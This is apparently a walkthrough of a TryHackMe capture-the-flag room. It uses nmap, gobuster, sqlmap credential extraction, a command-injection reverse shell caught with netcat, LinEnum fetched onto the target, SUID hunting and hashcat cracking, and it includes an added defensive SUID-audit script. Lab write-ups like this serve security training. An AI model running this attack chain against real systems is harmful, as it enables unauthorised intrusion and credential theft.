The Cod Caper -Try Hack Me (Writeup)

Govind Sharma
3 min read · Apr 29, 2020

Check out the room

https://tryhackme.com/room/thecodcaper

Task 2:

We’ll run nmap against the target:

#nmap -sV -A -p1-1000 -T4 <machine_ip>

Task 3:

As recommended, we’ll use gobuster; the link to the wordlist is given in the task.

Don’t forget the -x flag, which appends the given file extensions to every wordlist entry.

#gobuster dir -u <target_url> -w /path/to/wordlist -x html,php,txt

Here you have to check for the common file extensions, i.e. .html, .php and .txt.

Task 4:

We’ll use sqlmap for further exploitation.

Run the given command against the username and password fields.

After running this command, we’ll get the username and password for the admin page.

Task 5:

In the previous task we found the login page and, using sqlmap, obtained the username and password. After a successful login we’ll see a screen like this.

This page is vulnerable to command execution.

Now we’ll run nc on our system to catch a reverse shell from the target machine.

Payloads are given in the link provided in the description of the task.

#nc -lnvp 4444

Here my machine listens for the target machine on port 4444.

Now we’ll try the payloads one by one by running each in the command field shown in the image above.

Before running a payload, modify the IP address and port:

The port will be 4444.

The IP address is shown on the THM access page (your internal virtual IP address).

Luckily I got the reverse shell on running the first Perl payload from this page:

https://highon.coffee/blog/reverse-shell-cheat-sheet/

On further enumeration, you’ll find the password in a hidden directory.

You will find it at /var/hidden/pass by using the find command (searching from / rather than the current directory, and discarding permission errors):

#find / -name pass -type f 2>/dev/null

Task 6:

Step 1: Prepare the Script on Your Attack Machine

# mkdir linenum

# cd linenum/

LinEnum and its script can be found on GitHub:

#wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

#python -m SimpleHTTPServer 4444

Step 2: Download the Script on the Target Machine

Log in to the target machine over SSH:

#ssh pingu@<IP>

pingu@ubuntu$ cd /tmp

pingu@ubuntu$ wget <IP>:4444/LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ chmod +x LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ ./LinEnum.sh

Now look for the SUID files in the results.
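Because the privilege-escalation step hinges on spotting SUID files, here is an added shell example (it is not from this writeup or from LinEnum) that lists setuid/setgid files under a root directory and reports any that are missing from a known-good baseline file. The baseline format, one absolute path per line, is an assumption of this example. It is the same check a defender runs to audit a host for unexpected SUID binaries after a build or a suspected compromise.

```shell
#!/bin/sh
# Added example, not from the original writeup or from LinEnum.
# Assumption: BASELINE_FILE holds one absolute path per line of the
# setuid/setgid files that are expected on the host.

# list_suid_files ROOT
#   Print every regular file under ROOT (default /) that has the setuid
#   (4000) or setgid (2000) bit set, one per line, sorted. -xdev keeps the
#   search on one filesystem; permission errors are discarded.
list_suid_files() {
    root="${1:-/}"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# unexpected_suid ROOT BASELINE_FILE
#   Print the SUID/SGID files under ROOT that do not appear as an exact
#   line in BASELINE_FILE. Prints nothing (and exits 0) when all are known.
unexpected_suid() {
    root="$1"
    baseline="$2"
    list_suid_files "$root" | grep -v -x -F -f "$baseline" || true
}
```

Typical use is `list_suid_files / > suid-baseline.txt` on a freshly built host, then `unexpected_suid / suid-baseline.txt` during an audit; any path it prints is either a new package install or something that warrants a closer look.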

Task 10:

Now we have a hash to crack; here I have the given hash in the root.txt file.

We’ll use hashcat to crack it:

# hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

On completion we’ll have the root password.

Thanks for reading
